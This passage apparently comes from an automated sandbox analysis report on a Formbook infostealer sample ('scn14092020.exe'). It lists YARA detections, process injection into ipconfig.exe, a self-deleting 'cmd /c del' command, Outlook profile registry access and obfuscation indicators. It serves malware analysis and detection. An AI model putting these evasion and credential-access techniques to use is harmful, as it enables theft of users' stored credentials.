          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024B2FB04_2_024B2FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024CB4644_2_024CB464
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024CBCC54_2_024CBCC5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024B2D894_2_024B2D89
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024B2D904_2_024B2D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 02CAB150 appears 45 times
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: String function: 00F5B150 appears 72 times
          Source: scn14092020.exeStatic PE information: invalid certificate
          Source: scn14092020.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: scn14092020.exeBinary or memory string: OriginalFilename vs scn14092020.exe
          Source: scn14092020.exe, 00000000.00000002.174750025.000000000438D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAlienRunPE.dll6 vs scn14092020.exe
          Source: scn14092020.exeBinary or memory string: OriginalFilename vs scn14092020.exe
          Source: scn14092020.exe, 00000001.00000002.208820617.00000000011DF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs scn14092020.exe
          Source: scn14092020.exe, 00000001.00000002.208464928.0000000000EF7000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs scn14092020.exe
          Source: scn14092020.exeBinary or memory string: OriginalFilenameGoogle Chrome.exe< vs scn14092020.exe
          Source: 00000004.00000002.435232351.00000000024B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.435232351.00000000024B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.174998410.000000000453C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.174998410.000000000453C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.208383440.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.208383440.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.174895782.000000000448C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.174895782.000000000448C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.208400522.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.208400522.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.208071672.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.208071672.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.434194164.0000000000150000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.434194164.0000000000150000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.scn14092020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.scn14092020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.scn14092020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.scn14092020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: scn14092020.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/1@19/11
          Source: C:\Users\user\Desktop\scn14092020.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\scn14092020.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_01
          Source: scn14092020.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\scn14092020.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\scn14092020.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: scn14092020.exeVirustotal: Detection: 17%
          Source: scn14092020.exeReversingLabs: Detection: 14%
          Source: unknownProcess created: C:\Users\user\Desktop\scn14092020.exe 'C:\Users\user\Desktop\scn14092020.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\scn14092020.exe C:\Users\user\Desktop\scn14092020.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\scn14092020.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\scn14092020.exeProcess created: C:\Users\user\Desktop\scn14092020.exe C:\Users\user\Desktop\scn14092020.exeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\scn14092020.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: scn14092020.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: scn14092020.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: ipconfig.pdb source: scn14092020.exe, 00000001.00000002.208457424.0000000000EF0000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: scn14092020.exe, 00000001.00000002.208457424.0000000000EF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: scn14092020.exe, 00000001.00000002.208471225.0000000000F30000.00000040.00000001.sdmp, ipconfig.exe, 00000004.00000002.436685521.0000000002C80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: scn14092020.exe, ipconfig.exe

          Data Obfuscation:

          barindex
          Binary contains a suspicious time stampShow sources
          Source: initial sampleStatic PE information: 0xCD22C4C3 [Sun Jan 22 10:11:15 2079 UTC]
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 0_2_00FF02A1 push es; retf 0_2_00FF02F0
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_004148E6 push es; retf 1_2_004148ED
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00414977 push esi; ret 1_2_00414978
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_004149C5 pushfd ; iretd 1_2_004149C6
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_0041AAF5 push eax; ret 1_2_0041AB48
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_0041AB42 push eax; ret 1_2_0041AB48
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_0041AB4B push eax; ret 1_2_0041ABB2
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_0041ABAC push eax; ret 1_2_0041ABB2
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00417C73 push cs; retf 1_2_00417C7E
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00414E46 push 76AC60C6h; retf 1_2_00414E4B
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_005D02A1 push es; retf 1_2_005D02F0
          Source: C:\Users\user\Desktop\scn14092020.exeCode function: 1_2_00FAD0D1 push ecx; ret 1_2_00FAD0E4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_02CFD0D1 push ecx; ret 4_2_02CFD0E4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024CAAF5 push eax; ret 4_2_024CAB48
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024CAB4B push eax; ret 4_2_024CABB2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024CAB42 push eax; ret 4_2_024CAB48
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024CABAC push eax; ret 4_2_024CABB2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024C48E6 push es; retf 4_2_024C48ED
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024C4977 push esi; ret 4_2_024C4978
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024C49C5 pushfd ; iretd 4_2_024C49C6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024C4E46 push 76AC60C6h; retf 4_2_024C4E4B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4_2_024C7C73 push cs; retf 4_2_024C7C7E
          Source: initial sampleStatic PE information: section name: .text entropy: 7.9315085015

          Persistence and Installation Behavior:

          barindex
          Uses ipconfig to lookup or modify the Windows network settingsShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\user\Desktop\scn14092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\scn14092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\scn14092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\scn14092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\scn14092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\scn14092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\scn14092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\scn14092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\scn14092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\scn14092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\scn14092020.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\scn14092020.exeProcess information set: NOOPENFILEERRORBOX